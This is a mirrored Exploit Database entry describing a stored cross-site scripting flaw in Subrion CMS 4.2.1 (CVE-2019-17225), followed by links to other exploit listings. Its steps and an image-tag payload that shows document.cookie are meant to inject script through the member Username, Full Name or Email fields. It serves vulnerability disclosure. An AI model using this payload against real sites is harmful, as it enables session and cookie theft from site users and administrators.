Subrion 4.2.1 – ‘Email’ Persistant Cross-Site Scripting

Exploit Database
38 阅读

作者： Creatigon

日期： 2019-10-07
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/47469/

# Title: Subrion 4.2.1 - 'Email' Persistant Cross-Site Scripting
# Date: 2019-10-07
# Author: Min Ko Ko (Creatigon)
# Vendor Homepage: https://subrion.org/
# CVE : https://nvd.nist.gov/vuln/detail/CVE-2019-17225
# Website : https://l33thacker.com
# Description :Allows XSS via the panel/members/ Username, Full Name, or
# Email field, aka an "Admin Member JSON Update" issue.

First login the panel with user credential, Go to member tag from left menu.

http://localhost/panel/members/

Username, Full Name, Email are editable with double click on it. Insert the
following payload

<img src=x onerror=alert(document.cookie)>

last Exploits
Subrion 4.2.1 – ‘Email’ Persistant Cross-Site Scripting的更多信息

GR Board 1.8.6 – ‘page.php’ Remote File Inclusion：
MOBOTIX Video Security Cameras – Cross-Site Request Forgery (Add Admin)：
Friends in War Make or Break 1.7 – Cross-Site Request Forgery (Change Admin Password)：
Samsung DVR Firmware 1.10 – Authentication Bypass：
Cleanto 5.0 – SQL Injection：
phpMyAdmin 3.5.8/4.0.0-RC2 – Multiple Vulnerabilities：
pfSense 2.2.5 – Directory Traversal：
PandoraFMS NG747 7.0 – ‘filename’ Persistent Cross-Site Scripting：